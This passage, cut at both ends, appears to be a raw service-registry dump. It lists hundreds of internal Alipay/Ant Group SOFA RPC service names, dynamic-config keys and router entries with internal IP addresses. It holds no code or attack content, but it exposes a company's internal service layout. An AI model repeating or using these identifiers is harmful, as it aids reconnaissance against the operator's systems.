duleDrm.spr-fund-redeem-generate.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:scheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.BizRouteApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:paymentmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyActionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.member.MemberCardTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.promoworkbench.ApproverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:pfunddts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:huanyu-test-batch-exec-1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.easytest.agent.facade.DataExecutionFacade:1.0:iexclienttrdcenter_dataExecutionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.201.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bic.common.service.facade.wagu.BioSecurityInfoManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.invalidateContTemplateCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.ipaysales.open.facade.api.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.user.UserAttentionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.fluxexchange.FluxExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecommunity.common.service.facade.CommunityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.101.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:cstask_claimSearchCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.claim.invest.InvestRouteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.32.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csrobot.service.facade.mng.api.SmartTagMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundTopUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyInfoQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.ShopAppAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.transport.TransportManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemRCallService:1.0:pcloanpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.biz.service.impl.crmhome.TicketMenuSpiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.fund.BalanceRemindJudgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.FactorNewQueryService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.repayDeductSuccessMsgConfigVal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.volvo.biz.shared.task.ExeTaskEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.service.impl.LoadTestDebug:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.qa.QuestionAnswerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.pressure.PressureRouteFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.33.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.lotteryBingoUidJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.table.SummaryTableOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteye.data.DataSource:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.HealthOrderDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootrpcserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileappcommon.common.service.facade.baas.ProductTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.base.service.FinsignViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.common.service.facade.api.SnapshotStoreFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.WithdrawFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.facade.api.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.allin.facade.KbDisplayCategoryApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.accountrelation.service.AccountRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchpunish.facade.punishment.PunishmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscprod.facade.redpoint.SecuInfoReadTimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.easytest.agent.facade.SchedulerTriggerFacade:1.0:iexclienttrdcenter_scedulerTriggerFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.shared.schedule.mainsubtask.MainSubTaskLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointAccountQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.dsdb.facade.HealthGiftCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.auth.CrmhomeAuthCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.mng.ability.AbilityQpsMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.insight.LegoInsightQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_cloudFunds_isvEdit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdOpportunityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insdataprod:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsUpVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.zhihuMediaLevelMid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.pamir.operator.PamPropertyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-bakerytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instservice.common.service.facade.operatorauth.OperatorAuthManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.EnterpriseEmployeeReimbursementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.PrizeSecretCardManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.SummaryDerivativeIndexOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.finriskcenter.common.facade.api.guardian.sdk.standard.GuardianNotifier:1.0:fintradecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.trigger.SASTimeTriggerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.39.138.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intimateprod.common.service.facade.api.liteuser.FamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.distributelock.DistributeLockGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ucdpposition@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcif.facade.service.IdentitySyncService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.SupportCurrencyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:antbuservice-global@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.grid.GridMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundMerchantLoyaltyVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:Xlight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.CsCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_MOBILEANTI_PROCESSOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.service.OpenApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cap.common.service.tenant.CapDataSourceService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.masterdata.common.service.facade.MasterDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.devapi.facade.ToolModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_capitalUnfreezeCodeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.spu.SpuManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:approveAbsSubmitAssetTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.busriskdec.facade.riskcheck.services.RiskCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.sysparam.SysParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.mobileinfo.MobileInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.facade.DqBlinkQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CHARGE_EVENTS_BUF_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.callback.IsvTaskProcessCallback:1.0:bugscanIsvTaskProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeadapter.biz.inner.InnerRoutedService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.iexpbizprod:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.92.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:rating.product.standardChargeProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.api.DataDecisionService:1.0:myddszm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.attribute.AttributeMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.antmanager.facade.AntManagerFamilyGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayuarkbase.facade.DayuArkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finlinkdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instrbench4.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopValidationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.common.IamBackManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualRunStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.drc.rm.endpoint.openapi.DsCfgOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acdoccore.common.service.facade.category.CategorypullFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.AdMetaAlgorithmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.openapi.api.OpenApiFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:uif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.playbackmng.zplayback.data.service.DataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.backend.BizOrderModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.mitemcenter.common.service.facade.utils.ldc.ICLdcRzDrm.loadTestRZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cashiercore.service.facade.api.CashiercoreChannelSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbschedules.common.serivce.facade.ScheduleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.das.biz.share.config.DasTenantExportParamConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.application.service.tair.namespace.NamespaceTaskOfflineService:1.0:testNamespaceTaskOffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.control.RepeatedlyMerchantControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishRecDrmImpl.activityRecModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.api.InterestCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.certifycenter.service.withdraw.CertifyWithdrawManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.query.CardUseLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.SavingPlanDrmImpl.maxSavingPlan,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.171.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.exratecenter.service.facade.api.ExPubRateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.template.MsgTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.task.CommonTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizbilling.common.service.BizBillingBillQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.antforest.AntforestTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.operatelog.OperateLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.SaleSchemeQueryFacade:1.0:bksigncentre_saleSchemeQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.monthscope.InstFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.maxBurstSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.135.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.80.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","mfinsnsprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.policybench.common.service.facade.api.PolicyApproveCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iopenhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.china.plutus.mtop.creditbuy.service.TripleProdAggregationQueryService:1.0:1.0.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADCHARGE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.staff.api.UserOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.defininstchannel.common.service.facade.api.execute.InstChannelCallBackService:1.0:mytradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openeval@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcfluxmng_exchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.interact.SnsInteractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeTrusteeshipManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.client.Config.isJsonQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.stocktools.StockToolOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.giftmoney.GiftMoneyWishOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.space.traffic.ResourceTrafficApi:1.0:adexchange-promokernel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExOriginRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.levelzero.api.LztransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.251.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.40.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiswisdom.feature.common.service.facade.api.feature.FeatureInputQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aldingprod.common.service.facade.api.DpGuidelineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.category.facade.BasicCategoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:edge_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.237.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmonitor.risk.service.facade.RiskMatchSolutionsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSHEALTHMARKET#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_projectProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.poscore.logControlDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantcore.common.service.facade.dx.api.DxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.indirect.IndirectActivityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.coupon.CouponManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAUL